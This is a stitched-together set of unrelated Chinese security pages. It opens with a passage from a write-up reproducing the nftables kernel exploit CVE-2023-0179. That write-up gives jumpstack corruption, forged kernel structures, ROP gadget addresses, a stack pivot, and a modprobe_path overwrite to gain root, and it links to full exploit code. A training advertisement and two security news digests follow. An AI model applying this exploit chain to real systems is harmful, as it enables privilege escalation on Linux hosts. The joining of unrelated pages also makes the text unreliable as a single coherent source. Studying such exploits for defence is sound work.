regs.verdict.chain; goto do_chain; ... 还原chain的过程如下，通过递减stackptr来取出存储在jumpstack变量中存储的chain、rule、lastrule，然后就会跳转到next_rule对还原的rule，进行rule的解析，这里需要注意的是在遍历rule的时候，循环是通过rule < last_rule进行遍历的，因此我们在后续伪造last_rule的时候需要大于rule，否则是无法进入循环内部的。    next_rule:        regs.verdict.code = NFT_CONTINUE;        for (; rule < last_rule; rule = nft_rule_next(rule)) {            nft_rule_dp_for_each_expr(expr, last, rule) {                if (expr->ops == &nft_cmp_fast_ops)                    nft_cmp_fast_eval(expr, &regs);                else if (expr->ops == &nft_cmp16_fast_ops)                    nft_cmp16_fast_eval(expr, &regs);                else if (expr->ops == &nft_bitwise_fast_ops)                    nft_bitwise_fast_eval(expr, &regs);                else if (expr->ops != &nft_payload_fast_ops ||                     !nft_payload_fast_eval(expr, &regs, pkt))                    expr_call_ops_eval(expr, &regs, pkt);                if (regs.verdict.code != NFT_CONTINUE)                    break;           }   ...    if (stackptr > 0) {            stackptr--;            chain = jumpstack[stackptr].chain;            rule = jumpstack[stackptr].rule;            last_rule = jumpstack[stackptr].last_rule;            goto next_rule;       }   ... 紧接着来看一下nft_rule_dp结构体，可以发现第一个八个字节是一些标志位组成的，而后续的八个字节则是用于存储nft_expr结构体的指针。 struct nft_rule_dp { u64 is_last:1, dlen:12, handle:42; /* for tracing */ unsigned char data[] __attribute__((aligned(__alignof__(struct nft_expr)))); }; 然后可以看到nft_expr结构体里存储了函数指针，如果我们能够篡改该函数指针就可以劫持程序流程。 struct nft_expr { const struct nft_expr_ops *ops; unsigned char data[] __attribute__((aligned(__alignof__(u64)))); }; 然后在这篇文章https://www.ctfiot.com/100156.html学习到了一个小技巧。使用ptype /o struct xxx就可以看到具体的结构体信息与偏移。 因此构造的流程如下，首先我们通过漏洞溢出到nft_jumpstack结构体，并且修改rule变量为可控内容的地址同时需要将lastrule的值篡改为比rule更大的值，原因上述已经说过。紧接着在可控内容中伪造一个nft_rule_dp结构体，第一个八字节是填充位，而第二个八字节是需要伪造的函数表指针，同样的我们也将该指针篡改为可控内容的地址，然后再该地址处伪造nft_expr，并且将ops变量指向我们想要执行的函数即可。 通过上述分析已经知道了该如何通过漏洞完成程序流程的劫持，接下来需要分析如果伪造上述几个结构体。 首先在nft_payload_copy_vlan函数中，漏洞点是将vlan头的数据拷贝到指定的寄存器里面，而vlan头的地址是低于寄存器的地址，这就会导致在拷贝完vlan头后会将寄存器中的值也进行拷贝的操作，而寄存器的值我们是能人为控制的，因此就可以完成伪造的操作。 可以看到我们对NFT_REG32_00的赋值会覆盖到jumpstack[7].rule的值，完成了对jumpstack结构体的篡改，这里我们可以通过NFT_REG32_00 - NFT_REG32_15进行赋值，紧接着查看jumpstack哪个值是被赋值。就可以知道哪个jumpstack可以被篡改。 由于我们可以控制regs变量的值，我们可以首先泄露regs的地址，然后在regs上伪造rule即可。然后expr重新指向为jumpstack即可，这里采用了一个小技巧就是将last_rule设置为一个函数地址，由于函数地址的值是大于regs变量的地址值的，因此我们可以节约八个字节。 但是这里有个问题就是我们只能控制八个字节的函数指针，因此是无法构造一个完整的ROP链的，而内核并不存在像用户态下有one_gadget可以只利用八个字节就能完成利用，因此在这里必须使用栈迁移，迁移的目的是一段可以控制的内存，那么这里选用的目的自然就是regs了。那么该如何找栈迁移的gadget呢？，这里我首先采用的使用利用vmlinux-to-elf将bzImage的符号表提取出来，然后寻找对应的gadget，gadget类型如下 mov rsp,xxx push xxx;pop rsp add rsp,xxx xchg rsp,xxx 上述指令都可以修改rsp寄存器，完成栈迁移的效果。 首先通过vmlinux-to-elf ./bzImage ./vmlinux去提取出符号表 然后通过ropper进行gadget的提取，ropper --file ./vmlinux --nocolor > g 最后这在搜索gadget，cat g | grep 'add rsp.*ret'，但是通过尝试发现下述的地址都没办法使用，因为下述地址都不具备可执行的权限。 然后尝试了搜索上述所有的gadget，我都没有找到可以用的gadget，唯一比较接近的gadget是pop rsi的，但是无法控制rsi的寄存器，其实这里一开始我使用的镜像是自己编译的，这里搜索的gadget是需要控制rdi寄存器的，经过多次尝试无果后才使用了作者的config文件重新编译发现还是不可行。 其实我们在编译内核文件时是存在vmlinux文件的，但是那个文件十分的大，使用ropper工具无法分析，就在我准备放弃的时候，想到使用objdump工具进行gadget的提取 使用objdump -d -M intel vmlinux > ./gadget.txt -d是dump代码 -M是指定汇编代码的格式 objdump提取的速度非常快，提取代码如下，但是它没有ropper搜索gadget那么方便，但是会全的多 这里我首先尝试了搜索栈迁移的gadget，cat gadget.txt | grep -E 'add rsp.*' 可以发现有非常多的匹配的gadget，接着我们在gdb中验证可以使用的gadget，通常在栈进行还原的时候会用到add rsp,xxx，因此都是有效的gadget，然后就是计算栈顶与resg函数地址的差值找到相应的栈迁移gadget即可。 接下就是考虑如何进行提权的利用了，虽然我们可以控制regs但是可控的范围也只有0x40是不足于采用commit_creds(prepare_kernel_cred(0))设置root凭证然后返回到用户空间执行后门的。那么相当的一个办法就是通过覆盖modprobe_path进行提权。这里我找了下列gadget进行modprobe_path的覆盖，将rdi设置为modprobe_path，rax设置为覆盖后的路径即可。 0xffffffff810d1e6b: mov qword ptr [rdi], rax; ret; 0xffffffff81004165: pop rdi; pop rbp; ret 最后就是覆盖完modprobe_path该如何返回到用户态，因为modprobe_path的提权需要在用户态下执行非法文件头的文件，这里作者采用的是将栈还原，通过在rbp中的地址值覆盖会rsp中即可，采用下述gadget 0xffffffff810b47f0: mov rsp, rbp; pop rbp; ret; 但是在我的环境下直接返回不行，这是因为在返回到nf_hook_slow函数时，有对状态码的一个检验，而在上述覆盖modprobe_path时，我们设置了rax值，就导致无法将状态码设置成合法值。那分支就会跳转到default，导致报错。在尝试搜索了gadget之后，可以将rax设置为0，但是这回进入到NF_DROP分支 中，但是此时skb变量也被我们破坏了，无法正常执行。 int nf_hook_slow(struct sk_buff *skb, struct nf_hook_state *state, const struct nf_hook_entries *e, unsigned int s) { unsigned int verdict; int ret; for (; s < e->num_hook_entries; s++) { verdict = nf_hook_entry_hookfn(&e->hooks[s], skb, state); switch (verdict & NF_VERDICT_MASK) { case NF_ACCEPT: break; case NF_DROP: kfree_skb_reason(skb, SKB_DROP_REASON_NETFILTER_DROP); ret = NF_DROP_GETERR(verdict); if (ret == 0) ret = -EPERM; return ret; case NF_QUEUE: ret = nf_queue(skb, state, s, verdict); if (ret == 1) continue; return ret; default: /* Implicit handling for NF_STOLEN, as well as any other * non conventional verdicts. */ return 0; } } return 1; } 在尝试很久之后，最终放弃正常返回的这个选项，然后我在rbp中搜索是否有合适的返回地址。最后在rbp中我找到了一个do_softirq函数 该函数是一个软中断处理的函数，当时我就猜想，如果这个函数返回了，应该不会影响程序的执行。 尝试运行之后，发现还是有内核异常，顿时有点失望。 但是在操控命令行的时候是能够正常输入命令的，说明我们成功返回到用户态了。 最后就是查看是否将新用户写入到/etc/passwd中了，最终完成写入。完结撒花！。 完整exp可以参考https://github.com/h0pe-ay/Vulnerability-Reproduction/blob/master/CVE-2023-0179(nftables)/poc.c

为深入学习贯彻习近平总书记关于网络强国的战略思想，落实“十四五”规划和2035年远景目标纲要对网络安全工作的重要部署，把握当前国际国内、教育系统网络安全工作面临的新形势，加强网络安全宣传教育和人才培养，赋能学校打造经验丰富的网安教学师资队伍，全面提升网络安全技能的实战教学水平。针对网络安全应急响应、红蓝对抗实战演练等网安教学热点需求，特举办此次“2024年网络安全高级研修班”。 一、组织单位 指导单位：中国网络空间安全人才教育论坛 主办单位：湖南蚁景科技有限公司 二、培训内容 1、红蓝对抗实战演练工作内容 讲解红蓝对抗基本工作内容流程和红队渗透技术框架。 2、红队渗透攻击实战演练 红队攻击相关基础知识、方法流程、常规技术和工具应用等，包括信息收集、漏洞发现、漏洞利用、后渗透攻击、内网渗透、操作系统提权、以及渗透测试框架工具使用等，实战一次完整渗透过程中涉及的红队攻击技术。 3、蓝队应急响应实战演练 蓝队针对红队攻击行为，采用应急响应技术进行实战分析，发现并阻止攻击者行为。 三、培训对象 全国高校、职业院校计算机相关专业（信息安全、计算机科学与技术、网络安全、信息科学与工程、软件工程、网络工程等）专业负责人、学科带头人、专业骨干教师、实验室人员等。 四、预期收获 1、系统了解红蓝对抗攻防演练工作内容，交流工作流程安排。 2、掌握红队渗透攻击基础知识、常用攻击方法技术、常见工具使用方法。 3、学习对目标快速信息收集、漏洞发现、漏洞利用思路技巧。 4、掌握内网渗透流程、主机渗透方法思路。 5、结合渗透测试攻击框架，能快速进行渗透测试实战。 6、掌握蓝队应急响应、入侵行为分析检测方法技术。 7、一起实战红蓝对抗攻防场景演练。 8、获得由蚁景科技颁发的培训结业证书。 五、培训安排 1、培训方式：线下培训 2、培训时间：2024年1月22日-1月26日（1月21日报到） 3、培训地点：长沙维也纳国际酒店（树木岭地铁站店） 4、会议规模：100人 六、报名方式 1、报名时间：即日起至2024年1月21日 2、报名邮箱：EDU@antvsion.com 3、电话咨询：宋老师 13657413038  4、培训费用：3680元/人（含培训资料，路费和食宿费用自理，自备电脑） 5、付款方式：      ◆ 线上汇款： （请务必在备注栏里注明“学校名+参会者姓名”）         公司名称：湖南蚁景科技有限公司         开户行名称：建设银行长沙金星支行         开户行账号：4305 0178 4836 0000 0935      ◆ 现场缴费：现金、扫码或刷卡（银行卡、公务卡均可）  具体课程内容 扫描下方二维码即可报名：

1、研究人员发现针对韩国用户的恶意安卓和iOS应用程序 https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fake-android-and-ios-apps-steal-sms-and-contacts-in-south-korea/ 研究人员最近发现通过钓鱼网站传播的恶意安卓和iOS应用程序，这类恶意应用程序于十月初开始活跃，已经安装在200多台设备上，且所有设备都位于韩国。攻击者创建了多个钓鱼网站，并将它们伪装得与其他得合法网站相似，并在网站中提供恶意应用程序的安卓和iOS版本。当用户通过这个钓鱼网站下载并运行恶意的应用程序后，它将会窃取受害者的电话号码、相关联系人和短信消息等信息。 2、攻击者窃取Bloomberg Crypto官方推特账号用以进行钓鱼攻击 https://www.bleepingcomputer.com/news/security/bloomberg-crypto-x-account-snafu-leads-to-discord-phishing-attack/ 攻击者窃取Bloomberg Crypto的官方推特账号，并在账号的个人资料中添加一个指向Telegram频道的链接，该频道链接用于进一步引导访问者加入一个拥有33968名成员的假Bloomberg Discord服务器。在该Discord服务器中，用户首先需要通过Discord的验证，然后将会跳转至攻击者伪造的钓鱼网站中。该钓鱼网站提示用户进行Discord账号验证 3、攻击者利用蝙蝠侠游戏的安装程序进行攻击活动 https://cyble.com/blog/threat-actor-targets-batman-arkham-city-gamers-using-meterpreter/ 研究人员近期发现了一个经过恶意修改的《蝙蝠侠：阿卡姆之城》游戏安装程序，可能是通过钓鱼网站进行传播的。该安装程序是原游戏的修改版本，其中包含正版蝙蝠侠游戏的安装程序，以及一个恶意程序。该恶意程序用于执行VBS脚本以启动经过混淆处理的Meterpreter，然后使用Meterpreter执行其他恶意活动，包括从攻击者服务器下载执行其他恶意软件。 4、INC勒索团伙声称攻击医疗组织WellLife Network https://therecord.media/yamaha-welllife-network-confirm-cyberattacks WellLife Network是一家非盈利的组织，致力于为智力或发展障碍者以及患有精神疾病的人提供各种服务。INC勒索团伙于11月17日将该组织添加至其受害者名单中。11月6日，该机构发布公告通知其患者和员工，他们的IT团队在9月初发现了一次网络攻击。经调查已确定在2023年8月26日至2023年9月7日期间，未经授权的行为者已经访问了某些WellLife系统，并可能查看或获取了其中的一些信息，包括姓名、出生日期、人口统计信息和其他个人或健康等信息。 5、英国国家图书馆证实遭受勒索软件攻击 https://www.bleepingcomputer.com/news/security/british-library-ongoing-outage-caused-by-ransomware-attack/ 英国国家图书馆证实，勒索软件攻击是导致该图书馆多地点服务中断的主要原因。尽管该图书馆确认这是由勒索软件引起的，但它仍需将攻击与特定操作相联系，并确认是否有员工、用户的个人或财务信息遭到窃取。该图书馆尚未透露攻击者是如何侵入其系统的，而且在攻击发生近三周后，其网站仍然处于离线状态。该图书馆预计其许多服务将在未来几周内恢复，但一些中断可能会持续更长的时间。 6、江森自控修补了工业制冷产品中的严重漏洞 https://www.securityweek.com/johnson-controls-patches-critical-vulnerability-in-industrial-refrigeration-products/ 江森自控最近发布了针对外部研究人员在其部分工业制冷产品中发现的严重漏洞的补丁。根据江森自控和美国网络安全机构CISA发布的公告，该漏洞（编号为 CVE-2023-4804）可能“允许未经授权的用户访问意外暴露的调试功能”。受影响的产品包括 Frick Quantum HD Unity 压缩机、AcuAir、冷凝器/容器、蒸发器、发动机室和接口控制面板。 7、RHYSIDA 勒索软件团伙正在拍卖从大英图书馆窃取的数据 https://securityaffairs.com/154473/data-breach/rhysida-ransomware-gang-british-library.html Rhysida 勒索软件团伙将大英图书馆添加到其 Tor 泄露网站的受害者名单中。大英图书馆是位于伦敦的研究型图书馆，也是英国的国家图书馆。它是世界上最大的图书馆之一。该勒索软件组织声称窃取了大量“令人印象深刻的数据”，并以 20 比特币的价格进行拍卖。Rhysida 勒索软件运营商计划将窃取的数据出售给单个买家。该团伙将在宣布后 7 天内公开发布数据。 8、APT29 组织利用 WINRAR 0DAY 攻击大使馆 https://securityaffairs.com/154460/apt/apt29-targets-embassies-winrar-flaw.html 与俄罗斯有关的网络间谍组织 APT29 在最近的攻击中利用了 WinRAR 中的 CVE-2023-38831 漏洞。APT 组织针对多个欧洲国家，包括阿塞拜疆、希腊、罗马尼亚和意大利，主要目标是渗透大使馆实体。 9、LummaC2 恶意软件部署新的基于三角学的反沙箱技术 https://thehackernews.com/2023/11/lummac2-malware-deploys-new.html 名为LummaC2（又名 Lumma Stealer）的窃取恶意软件现在采用了一种新的反沙箱技术，该技术利用三角学的数学原理来逃避检测并从受感染的主机中窃取有价值的信息。 10、印度雇佣黑客组织十多年来一直针对中国、美国等国家 https://thehackernews.com/2023/11/indian-hack-for-hire-group-targeted-us.html 一个印度雇佣黑客组织以美国、中国、缅甸、巴基斯坦、科威特和其他国家为目标，作为十多年来广泛间谍、监视和破坏行动的一部分。根据 SentinelOne 的深入分析，Appin Software Security（又名 Appin Security Group）最初是一家提供攻击性安全培训计划的教育初创公司，同时至少从 2009 年起就开展秘密黑客行动。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、FortiSIEM统一风险管理平台存在高危漏洞 https://www.bleepingcomputer.com/news/security/fortinet-warns-of-critical-command-injection-bug-in-fortisiem/ Fortinet向客户发出警告，称FortiSIEM平台中存在严重的命令注入漏洞，未经身份验证的攻击者可能通过精心制作的API请求执行命令。该漏洞被标记为CVE-2023-36553，Fortinet的产品安全团队发现该漏洞，并为其分配了9.3的严重性分数，而美国国家标准与技术研究所（NIST）对该漏洞分配的严重性分数为9.8。研究人员表示，CVE-2023-36553是另一 2、攻击者声称泄露智能WiFi提供商Plume的数据 https://www.hackread.com/hackers-smart-wi-fi-provider-plume-data-breach/ 攻击者目前声称窃取了Plume公司超过20GB的Wi-Fi数据库，其中包含超过1500万行信息。攻击者发布了两个CSV文件，并称其中分别包含公司客户和员工的数据。第一个文件包括公司约26000名客户的电子邮件地址、全名、国家、设备详情以及其他相关信息。第二个文件包含3086个电子邮件地址和全名，攻击者声称这些属于Plume的员工，其中大多数泄露的电子邮件地址与@plume.com和@plumewifi.com域相关，但并不包含密码信息。攻击者称此次 3、研究人员发现多个恶意PyPI软件包 https://checkmarx.com/blog/attacker-hidden-in-plain-sight-for-nearly-six-months-targeting-python-developers/ 研究人员发现27个伪装成合法Python库的软件包，并已经被下载数千次。这次攻击的一个显著特征是利用隐写术将恶意负载隐藏在一个看似无害的图像文件中，从而增加了攻击的隐秘性。这些软件包的共同特点是使用setup.py脚本引用其他恶意软件包，这些软件包使用VBScript下载和执行一个名为Runtime.exe的文件，并在主机上实现持久性，该文件能够从Web浏览器、加密货币钱包和其 4、攻击者利用Zimbra的零日漏洞针对多国政府机构进行攻击 https://www.bleepingcomputer.com/news/security/google-hackers-exploited-zimbra-zero-day-in-attacks-on-govt-orgs/ 研究人员发现，攻击者利用Zimbra Collaboration电子邮件服务器中的一个零日漏洞，从多个国家的政府系统中窃取敏感数据。攻击者自6月29日以来利用了这个中危漏洞，该漏洞被标记为CVE-2023-37580。研究人员表示，攻击者利用该漏洞窃取希腊、摩尔多瓦、突尼斯、越南和巴基斯坦等国的政府系统中的敏感数据，包括电子邮件数据、用户凭据和身份验证令牌，执行电子邮件 5、CISA提醒各机构修复Windows、Sophos和Oracle中的漏洞 https://www.bleepingcomputer.com/news/security/cisa-warns-of-actively-exploited-windows-sophos-and-oracle-bugs/ 美国网络安全与基础设施安全局（CISA）已将影响Microsoft设备、Sophos产品以及Oracle企业解决方案的三个安全问题添加到其已知被利用漏洞（KEV）目录中。该机构敦促联邦机构在12月7日之前应用这三个问题的可用安全更新。这三个漏洞的信息如下：CVE-2023-36584：微软Windows上的“Mark of the Web”（MotW）安全特性绕过漏洞；C 6、Chrome浏览器更新修复了两个高危漏洞 https://cybersecuritynews.com/google-chrome-vulnerability-browser-crash/ Chrome浏览器推出稳定版本更新，并修复两个漏洞，分别被标记为CVE-2023-5997和CVE-2023-6112。CVE-2023-5997存在于Chrome 119.0.6045.159之前的版本中，攻击者能够通过精心制作的HTML页面进行堆损坏，Chromium 将此漏洞分类为高严重性。CVE-2023-6112与上一个漏洞类似，攻击者可以通过精心制作的HTML页面执行堆损坏。此漏洞的严重性尚未确认。 7、三星证实第三方应用程序漏洞导致英国用户数据泄露 https://www.bleepingcomputer.com/news/security/new-samsung-data-breach-impacts-uk-store-customers/ 三星电子正在通知一些顾客，称一次数据泄露使他们的个人信息泄露。三星在11月13日发现了这次数据泄露，并确定是攻击者利用该公司使用的第三方应用程序中的漏洞造成的。三星表示，这次网络攻击仅影响了在2019年7月1日至2020年6月30日期间从三星在线商店购物的英国顾客，可能暴露的数据包括姓名、电话号码、邮政地址和电子邮件地址，并强调此次事件未影响凭据或财务信息。 8、CrushFTP存在远程代码执行漏洞 https://www.bleepingcomputer.com/news/security/exploit-for-crushftp-rce-chain-released-patch-now/ CrushFTP企业套件中存在远程代码执行漏洞，未经身份验证的攻击者可以通过公开发布的概念验证漏洞利用代码来访问服务器上的文件，执行代码并获取明文密码。该漏洞于2023年8月被发现，被标记为CVE-2023-43177。开发人员在CrushFTP 10.5.2版本中对该漏洞进行了修复。研究人员称，大约有10000个暴露在网络中的CrushFTP，尽管尚未确定易受攻击的具体数量，但攻击面相当大，因此C 9、威胁行为者利用恶意Google广告诱骗WinSCP用户安装恶意软件 https://thehackernews.com/2023/11/beware-malicious-google-ads-trick.html 威胁行为者正在利用操纵的搜索结果和虚假的 Google 广告来欺骗那些想要下载 WinSCP 等合法软件的用户来安装恶意软件。 10、俄罗斯 APT Gamaredon 使用 USB 蠕虫 LitterDrifter 攻击乌克兰 https://securityaffairs.com/154362/apt/gamaredon-apt-litterdrifter-usb.html Check Point 研究人员观察到，与俄罗斯有关的Gamaredon在针对乌克兰的攻击中通过 USB 传播名为 LitterDrifter 的蠕虫病毒。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。